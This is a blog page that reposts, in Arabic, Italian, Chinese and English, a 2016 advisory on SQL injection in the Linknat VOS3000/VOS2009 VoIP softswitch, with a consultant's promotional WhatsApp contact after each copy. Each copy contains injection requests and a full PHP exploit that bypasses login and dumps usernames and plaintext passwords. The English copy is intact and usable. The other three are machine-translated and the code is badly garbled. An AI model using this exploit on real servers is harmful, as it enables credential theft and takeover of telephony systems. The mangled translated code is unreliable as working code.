        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {20
        foreach ( $post $key = > $value)
            $post_items = $key . '=' . urlencode ($value[]) ؛
        $post_string = "الهدّة" ('&&'، $post_items)؛
        curl_setopt ($curl، CURLOPT_POST، 1)؛
        curl_setopt ($curl، CURLOPT_POSTFIELDS، $post_string)؛
    }
    $data = curl_exec ($curl)؛
    curl_close ($curl)؛
    العودة $data ، ولكن
}

استعلام الدالة($host، $query) {
    $data = حليقة ("http://$host/eng/login.jsp";, صفيف
            "loginType" = > 1،
            "name" => "الاتحاد" . $query . "#",
            "تمرير" = > "' أو ''='"
        )، فارغة، صحيحة)؛
    preg_match_all('| تعيين ملف تعريف الارتباط: (.*); |U'، $data، $matches)؛
    $cookies = تنهار ('؛ '، $matches)؛
    [1]$data = حليقة ("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts = تنفجر ("|", تقليم ($data));

إذا (العد($parts) < 7)
        return false;

    return array($parts, $parts);
[3]}

funct[4]ion ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid = الحد الأقصى[$k] ($wid، str[$k]len($v))؛
    }
    foreach($wid $k = > $v) {
        $fmt = "%-{$[$k]v}s";
        $sep = str_r[$k]epeat ('-'، $v)؛
    }
    $fmt = '| ' . تنهار (' | '، $fmt) . ' |';
    $sep = '+-' . تنهار ('-+-'، $sep) . '-+';
    $buf = صفيف ($sep، $sep vsprintf($fmt، $keys)، و
    foreach($data كما $row)
        $buf = vsprintf ([]$fmt، $row)؛
        $buf = $sep؛
    []}
    العودة تنهار ("n", $buf);
}

راية();
echo "n";
صدى "الهدف: $hostn";
صدى "عمود #1: $column_onen";
صدى "العمود #2: $column_twon";
صدى "جدول: $tablen";
صدى "أخرى: $othern"؛
echo "n";

$results = صفيف();
$count_result = استعلام($host، "حدد 1,2,COUNT(*), 4,5,6 من $table
$other")؛
إذا ($count_result) {
    $count = intval ($count_result);
    echo "العثور على $count الصفوف...n"[0];

لـ ($i= 0؛ $i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $colum[0]n_two="" .="" "=" . hex2bin($result) .
" n";="" [1]}="" else="" {="" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array([]$column_one" ==""> سداسي عشري ($result)،[0] $column_two
=> سداسي عشري ($resu[1]lt));
    }

إذا (عدد($results) > 0) {
        echo "nn" . ascii_table($results) "n";
    }
} آخر {
    echo "خطأ في استرداد عدد الصفوف"؛
}

?></$count;>

من 2016 الناس باستخدام بعض أجهزة حقن SQL لينة الإختراق VOS3000, لدينا نظامنا الأمن الخاصة من ذلك الوقت, قمنا بتحديث نظامنا الأمني قوية جدا الآن, كان تركيز عملي دائما للأمن لvoip لينة التبديل. معظم الوقت أعطى نصيحة مجانية أو تبادل المعلومات قدر الإمكان مجانا. لا يزال هناك الكثير من الأشياء القذرة يركض، لذا يرجى توخي الحذر دائما ومعرفة المزيد. وإلا فإنك لن تكون قادرة على القيام بأعمال تجارية جيدة من أي وقت مضى. الآن في أيام الناس باستخدام البرامج النصية المخفية أو ملورس في VOS3000 برنامج العميل الإختراق VOS Server.

لمزيد من المساعدة تدق لي في ال WhatsApp: +880191119966 – سأفعل مساعدة جميع الطرق.

COME VOS3000 Ottenere Hacked da SQL Injection Script, prevenire l'hacking!

June 4, 2019November 22, 2020 king

Linknat VOS2009/VOS3000 SQL injection


Da: Osama Khalid <osama ()="" codinghazard="" com="">D
ata: Giovedi, 19 Maggio 2016 16:52:54</osama>


Un'iniezione SQL è stata trovata in Linknat VOS3000/VOS2009, un voIP popolare
softswitch, che potrebbe consentire agli aggressori remoti di accedere al
credenziali memorizzate in testo normale.

Applicazione: Linknat VOS3000/VOS2009
Versioni interessate: 2.1.1.5, 2.1.1.8, 2.1.2.0
URL fornitore: http://www.linknat.com/
Bug: SQLi (con privilegi DBA)
Tipo: Remoto
Soluzione: fisso, aggiornamento a 2.1.2.4 o 2.1.6.0 Versione pulita
Riferimento: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SqLi segnalato è cieco basato sul tempo. Poiché non si tratta di un SQLi in banda,
risultati possono essere raccolti dalla produzione di .jsp durante lo stesso
Sessione.

(prima richiesta)

POST http://target/eng/login.jsp
Tipo di login PARAM 1
        name: 'unione selezionare 1,2,@@version,'ciao',5,6
        pass: OR '''

(seconda richiesta durante la stessa sessione)

GET http://target/eng/welcome.jsp
RISULTATO 0'' unione select
1,2,@@version,'ciao',5,6' 1'5.0.51a-community'hello'0.[ EXPLOIT CODE ]0.00

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $arg[1]v;
$column_one   = isset($arg[2]v) ? $arg[2]v : "loginname";
$column_two   = isset($argv[3]) ? $argv[3] : "password";
$table        = isset($argv[4]) ? $argv[4] : "e_user";
$other        = isset($argv)[5] ? $argv [5]: "";

function banner() {
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php n";[HOST]
    echo "php vos3000.php 127.0.0.1n";
    echo "php vos3000.php     [HOST]n[COL1]"[COL2];[TABLE]
[OTHER SQL]    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0)
        foreach ($post come $key di > $value)
            $post_items - $key .[] '=' . urlencode($value);
        $post_string : implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data : curl_exec ($curl);
    curl_close($curl);
    restituire $data;
}

funzione query($host, $query)
    $data : curl("http://$host/eng/login.jsp";, array(
            "loginType" - > 1,
            "nome" - > "' unione " . $query . "#",
            "pass" - > "' OR ''''"
        ), null, true);
    preg_match_all('' Set-Cookie: ($matches $data.
    $cookies : implodere('; ', $matches);
    $data : [1]curl("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts : esplodi ("""" , trim($data));

if (count($parts) < 7)
        return false;

    return array($parts, $parts);
}

func[3]tion asc[4]ii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid : max($wid, strlen([$k]$v));
    }[$k]
    foreach($wid come $k di > $v)
        $fmt: "%-$v";
        $[$k]sep : str_repeat ('-', $v)[$k];
    }
    $fmt : ' ' . implodere(' ', $fmt) . ' |';
    $sep di tipo '-' . implode ('--', $sep) . '-+';
    $buf: array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data come $row)
        $buf vsprintf($fmt, $row)[];
        $buf - $sep;
    }
    rest[]ituire implode(""n", $buf);
}

banner();
eco "n";
eco "Target: $host";
echo "#1: $column_one";
echo "Colonna #2: $column_due";
eco "Tabella: $table n";
eco "Altro: $other n";
eco "n";

$results : array();
$count_result : query($host, "SELECT 1,2,COUNT('),4,5,6 FROM $table
$other");
if ($count_result)
    $count : intval($count_result);
    echo "Trovato $count righe...

for ($i 0; $i<[0]$count; $i++)="" {="" $q="SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=[0]" . hex2bin($result) .
" n";="" }="" else="" {="[1]" echo="" "error="" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" =="[]"> hex2bin($result), $column_2
<>a0></a[0]0> $result a1><
    }

if (count([1]$results) > 0)
        echo "n"n" . ascii_table($results) . "n";
    }
- altro .
    echo "Errore durante il recupero del numero di righe";
}

?></$count;>

Dal 2016 Persone che utilizzano alcuni prodotti soft iniezione sql per incidere VOS3000, Abbiamo il nostro sistema di sicurezza da quel momento, abbiamo aggiornato il nostro sistema di sicurezza troppo forte ora, il mio obiettivo di lavoro era sempre per la sicurezza per voip soft-switch. La maggior parte del tempo ho dato consigli gratuiti o informazioni condivise il più possibile gratuitamente. Ancora ci sono un sacco di cose sporche in giro, quindi si prega di stare attenti sempre e saperne di più. Altrimenti non sarai mai in grado di fare buoni affari mai. Ora-a-days Persone che utilizzano script nascosti o malware nel software client VOS3000 per hackerare VOS Server.

Per più aiuto Knock me in whatsapp: 8801911119966 – farò aiutare tutti i modi.

VoS3000 如何被黑客攻击的 SQL 注入脚本, 防止黑客攻击!

June 4, 2019November 22, 2020 king

林克纳特VOS2009/VOS3000 SQL 注入


从: 奥萨马· <osama ()="" codinghazard="" com="">哈立德 日
期: 2016年5月19日 星期四 16:52:54 +0500</osama>


在 Linknat VOS3000/VOS2009 中发现了 SQL 注入,这是一种流行的 VoIP
软开关,可以允许远程攻击者访问
以纯文本存储的凭据。

应用: Linknat VOS3000/VOS2009
受影响的版本: 2.1.1.5, 2.1.1.8, 2.1.2.0
供应商 URL: http://www.linknat.com/
错误: SqLi (具有 DBA 特权)
类型:远程
分辨率:已修复,升级到 2.1.2.4 或 2.1.6.0 清洁版本
型号: 吴云-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

SQLi 报告是基于时间的盲人。 因为它不是带内SQLi,
结果可以从欢迎的输出中收集.jsp期间
会话。

(第一次请求)

邮政http://target/eng/login.jsp
PARAM 登录类型=1
        名称=' 联合选择 1,2,@@version",'你好',5,6#
        通过'或'''''

(同一会话期间的第二个请求)

获取http://target/eng/welcome.jsp
结果 0=' 联合选择
1,2,@@version,"你好",5,6#1=5.0.51a社区[hello{0.00]0.00]

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The [ EXPLOIT CODE ]exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc  < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv;
$column_one   = isset($argv) ? $argv :[1] "loginname";
$column_two  [2] = isset[2]($argv) ? $argv : "password";
$table     [3]   = iss[3]et($argv) ? $argv : "e_user";
$other   [4]     = is[4]set($argv) ? $argv : "";

function ba[5]nner() {[5]
    echo "########################################n";
    echo "#                                      #n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #n";
    echo "#                                      #n";
    echo "#             Osama Khalid             #n";
    echo "########### codinghazard.com ###########n";
}

function usage() {
    echo "n";
    echo "php vos3000.php[HOST] n";
    echo "php vos3000.php 127.0.0.1n";
    echo "php vos300[HOST]0[COL1].[COL2]p[TABLE]h[OTHER SQL]p     n";
    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables "where table_schema = 'mysql'"
n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) |
        foreach ($po[]st为 $key [> $value)
            $post_项目 = $key 。'=' .urlencode ($value);
        $post_string = 内爆('&',$post_项);
        curl_setopt($curl,CURLOPT_POST,1);
        curl_setopt($curl,CURLOPT_POSTFIELDS,$post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    返回$data;
}

函数查询($host$query) |
    $data = 卷曲("http://$host/eng/登录.jsp";, 数组(
            "登录类型"=> 1,
            "名称"=>"联盟"。$query."#",
            "通过" > "或"""""""""""""""""""""""""""""""""""""""""
        ),空,真);
    preg_match_all('|设置曲奇: (.*$matches $data);
    $cooki[1]es = 内爆 (';",$matches);
    $data = 卷曲("http://$host/eng/欢迎.jsp";, 数组 (), $cookies, 假);
    $parts = 爆炸("=",修剪($data);

如果 (计数($parts) < 7)
        return false;

    return array($[3]parts, [4]$parts);
}

function ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $[$k]v)
       [$k]     $wid = 最大值($wid,条纹($v);
    }
    前 ($wid作为$k [> $v)]
  [$k]      $fmt = "%-[$v]";
 [$k]       $sep = str_repeat ('-', $v);
    }
    $fmt "' .内爆(')', $fmt) 。' |';
    $sep = "=-" 。爆裂('-=-',$sep)。'-+';
    $buf = 数组($sep,vsprintf($fmt,$keys),$sep);
    每一$data ($row) |
        $buf = vsprin[]tf($fmt,$row);
        $buf = $sep;[]
    }
    返回内爆("n",$buf);
}

横幅();
回音"n";
回音"目标:$hostn";
回音"列#1:$column_onen";
回音"列#2:$column_2n";
回音"表:$tablen";
回音"其他:$othern";
回音"n";

$results = 数组();
$count_result = 查询($host,"选择 1,2,COUNT(*),4,5,6 $table
$other");
如果 ($count_结果) |
    $count = intval($count_结果);
    回音"$count行...n";

用于 ($i=0;$i<$count; $i++)="" {="" $q="SELECT 1,2,HEX($col[0]umn_one),HEX($column_two),5,6 FROM $table
$other LIMIT " .="" $i="" .="" ",1";="" $result="query($host," $q);="" if="" ($result)="" {="" echo="" "r"="" .="" ($i+1)="" .="" "]t"="" .="" $column_one="" .="" "=" .
hex2bin($result) . " ,="" "="" .="" $column_two="" .="" "=" . hex2bin($result) [0].
" n";="" }="" else="" {="" echo="" "error=[1]"" retrieving="" row="" "="" .="" ($i+1)="" .="" "n";="" }="" $results="array($column_one" =="">十六进制 ($[]result), $column_2
•>十六进制($result);使[0]用十进制十六进制($result));$result十六进制"[1];$result十六进制";$result
    }

如果 (计数 ($results) > 0) |
        回显"nn"。ascii_table($results) ."n";
    }
[否则]
    回显"错误检索行计数";
}

?></$count;>

从 2016 年人们使用一些 sql 注入软产品来破解 VOS3000, 我们有自己的安全系统, 从那个时候开始, 我们更新我们的安全系统太强了, 我的工作重点总是为 voip 软切换的安全. 大多数时候,我给免费的建议或共享信息尽可能免费。 仍然有很多脏东西跑来跑去, 所以请永远小心, 知道更多。 否则,你永远无法做好生意。 现在一天人们使用在VOS3000客户端软件中隐藏的脚本或恶意软件来破解VOS服务器。

更多帮助敲我在 whatsapp: +880191119966 – 我会做帮助所有的方式。

HOW VOS3000 Get Hacked by SQL Injection Script, prevent Hacking!

June 4, 2019March 10, 2026 king1 Comment

Linknat VOS2009/VOS3000 SQL injection


From: Osama Khalid <osama () codinghazard com>
Date: Thu, 19 May 2016 16:52:54 +0500


A SQL injection was found in Linknat VOS3000/VOS2009, a popular VoIP
softswitch, that could allow remote attackers to gain access to the
credentials stored in plain-text.

Application: Linknat VOS3000/VOS2009
Versions Affected: 2.1.1.5, 2.1.1.8, 2.1.2.0
Vendor URL: http://www.linknat.com/
Bug: SQLi (with DBA privileges)
Type: Remote
Resolution: Fixed, upgrade to 2.1.2.4 or 2.1.6.0 Clean Version
Reference: WooYun-2015-145458 -
http://www.wooyun.org/bugs/wooyun-2010-0145458

The SQLi reported is time-based blind. Since it is not an in-band SQLi, the
results can be gathered from the output of welcome.jsp during the same
session.

(1st request)

POST    http://target/eng/login.jsp
PARAM   loginType=1
        name=' union select 1,2,@@version,'hello',5,6#
        pass=' OR ''='

(2nd request during the same session)

GET     http://target/eng/welcome.jsp
RESULT  0|' union select
1,2,@@version,'hello',5,6#|1|5.0.51a-community|hello|0.00|0.00|

[ EXPLOIT CODE ]

<?php
#
# Linknat VOS2009/VOS3000 SQLi exploit
#
# DISCLAIMER: The exploit is to be used for educational purposes only
#             The author would not be responsible for any misuse
#
# AUTHOR:     Osama Khalid
# WEBSITE:    http://www.codinghazard.com/
# DATE:       19/05/2016
# REF:        http://www.wooyun.org/bugs/wooyun-2010-0145458

if ($argc < 2) {
    banner();
    usage();
    exit;
}

$host         = $argv[1];
$column_one   = isset($argv[2]) ? $argv[2] : "loginname";
$column_two   = isset($argv[3]) ? $argv[3] : "password";
$table        = isset($argv[4]) ? $argv[4] : "e_user";
$other        = isset($argv[5]) ? $argv[5] : "";

function banner() {
    echo "########################################\n";
    echo "#                                      #\n";
    echo "# Linknat VOS3000/VOS2009 SQLi exploit #\n";
    echo "#                                      #\n";
    echo "#             Osama Khalid             #\n";
    echo "########### codinghazard.com ###########\n";
}

function usage() {
    echo "\n";
    echo "php vos3000.php [HOST]\n";
    echo "php vos3000.php 127.0.0.1\n";
    echo "php vos3000.php [HOST] [COL1] [COL2] [TABLE] [OTHER SQL]\n";
    echo "php vos3000.php 127.0.0.1 table_schema table_name
information_schema.tables \"where table_schema = 'mysql'\"
\n";
}

function curl($url, $post = array(), $cookies = null, $header = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($curl, CURLOPT_HEADER, $header);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if ($cookies != null)
        curl_setopt($curl, CURLOPT_COOKIE, $cookies);
    if (count($post) > 0) {
        foreach ( $post as $key => $value)
            $post_items[] = $key . '=' . urlencode($value);
        $post_string = implode('&', $post_items);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post_string);
    }
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}

function query($host, $query) {
    $data = curl("http://$host/eng/login.jsp";, array(
            "loginType" => 1,
            "name" => "' union " . $query . "#",
            "pass" => "' OR ''='"
        ), null, true);
    preg_match_all('|Set-Cookie: (.*);|U', $data, $matches);
    $cookies = implode('; ', $matches[1]);
    $data = curl("http://$host/eng/welcome.jsp";, array(), $cookies, false);
    $parts = explode("|", trim($data));

    if (count($parts) < 7)
        return false;

    return array($parts[3], $parts[4]);
}

function ascii_table($data) {
    $keys = array_keys(end($data));
    $wid = array_map('strlen', $keys);
    foreach($data as $row) {
        foreach(array_values($row) as $k => $v)
            $wid[$k] = max($wid[$k], strlen($v));
    }
    foreach($wid as $k => $v) {
        $fmt[$k] = "%-{$v}s";
        $sep[$k] = str_repeat('-', $v);
    }
    $fmt = '| ' . implode(' | ', $fmt) . ' |';
    $sep = '+-' . implode('-+-', $sep) . '-+';
    $buf = array($sep, vsprintf($fmt, $keys), $sep);
    foreach($data as $row) {
        $buf[] = vsprintf($fmt, $row);
        $buf[] = $sep;
    }
    return implode("\n", $buf);
}

banner();
echo "\n";
echo "Target:    $host\n";
echo "Column #1: $column_one\n";
echo "Column #2: $column_two\n";
echo "Table:     $table\n";
echo "Other:     $other\n";
echo "\n";

$results = array();
$count_result = query($host, "SELECT 1,2,COUNT(*),4,5,6 FROM $table
$other");
if ($count_result) {
    $count = intval($count_result[0]);
    echo "Found $count rows...\n";

    for ($i=0; $i<$count; $i++) {
        $q = "SELECT 1,2,HEX($column_one),HEX($column_two),5,6 FROM $table
$other LIMIT " . $i . ",1";
        $result = query($host, $q);
        if ($result) {
            echo "R" . ($i+1) . "]\t" . $column_one . " = " .
hex2bin($result[0]) . ", " . $column_two . " = " . hex2bin($result[1]) .
"\n";
        } else {
            echo "Error retrieving row " . ($i+1) . "\n";
        }
        $results[] = array($column_one => hex2bin($result[0]), $column_two
=> hex2bin($result[1]));
    }

    if (count($results) > 0) {
        echo "\n\n" . ascii_table($results) . "\n";
    }
} else {
    echo "Error retrieving row count";
}

?>

From 2016 People using some sql injection soft wares to hack VOS3000, We have our own security system from that time, we updated our security system too strong now, my work focus was always for security for voip soft-switch. Most of the time i gave free advice or shared information as much possible free of cost. Still there are lots of dirty things running around, so please be careful always and know more. Otherwise you will never able to do good business ever. Now-a-days People using hidden scripts or malwares in VOS3000 Client software to hack VOS Server.

For More Help Knock me in whatsapp: +8801911119966 – i will do help all the ways.

Posts navigation

Older Posts
Newer Posts

Recent Posts

  • VOS3000 IVR Codec Priority Advanced Voice Prompt Encoding Easy Configuration
  • VOS3000 IVR Custom Ringback Tone Dynamic CRBT Configuration Guide
  • VOS3000 IVR Callback Timing Important KEEP_LINE_RING_TIME Configuration
  • VOS3000 IVR Call State UDP Reporting Reliable Real-Time Notification
  • VOS3000 IVR Inband DTMF Detection Accurate Dual-Tone Recognition Setup
  • VOS3000 IVR DTMF Parse Mode Smart Auto vs Manual Key Important Detection
  • VOS3000 IVR Voicemail System Complete Expire Max Number Max Time Configuration
  • VOS3000 IVR Voice Alarm Configuration Proven Caller Confirm Key Period Retry
  • VOS3000 IVR Voicemail Navigation Flexible Key Mapping Best Configuration
  • VOS3000 Display Caller ID Forwarding Important Flexible Number Presentation Control
  • VOS3000 Monthly Consumption Limits Proven Min Max Service Fee Configuration
  • VOS3000 Do Not Disturb Mode Effective DND Call Blocking Configuration
  • VOS3000 Call Forwarding Five Types Comprehensive Unconditional NoReply Busy Period Offline
  • VOS3000 Reverse Charging Configuration Smart Bill-the-Callee Easy Setup
  • VOS3000 DID DDI Numbers Complete Direct Inward Dialing Best Configuration
  • VOS3000 Authorization Type Hierarchy: Important International Domestic Local Net
  • VOS3000 Call Authentication Mode: Comprehensive IP Port Password Selection
  • VOS3000 Authentication Retry Limits: Effective SS_AUTHENTICATION_MAX_RETRY
  • VOS3000 Lightweight Registration Interval: Proven SS_ENDPOINTTIMETOLIVE
  • VOS3000 Registration Replace Kick: Reliable SS_ENDPOINT_REGISTER_REPLACE
  • VOS3000 TCP Close Reset: Super Fast SS_TCP_CLOSE_RESET Connection Handling
  • VOS3000 Unauthorized SIP Response: Secure SS_REPLY_UNAUTHORIZED Setting
  • VOS3000 Password Policy Configuration: Robust Length and Character Rules
  • VOS3000 Login Brute-Force Lockout: Essential Failed Disable Time
  • VOS3000 Concurrent Call Abuse Blacklist: Robust SS_BLACK_LIST_CALLER_CONCURRENT
[email protected]
+8801911119966
Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!Change VOS3000 2.1.9.07 Chinese Client to English Client Easy Step!
VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!VOS3000 2.1.8.00 / 2.1.8.05 Complete English Manual Download Free!
VOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) ImportantVOS3000 软交换系统完整技术指南(安装、服务器、价格与安全) Important
Configuración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORTConfiguración servidor LRN VOS3000 Reliable parámetros SS_LRN_SERVER_IP PORT
Proudly powered by WordPress | Theme: Nucleare by CrestaProject.
Back to top
WhatsApp chat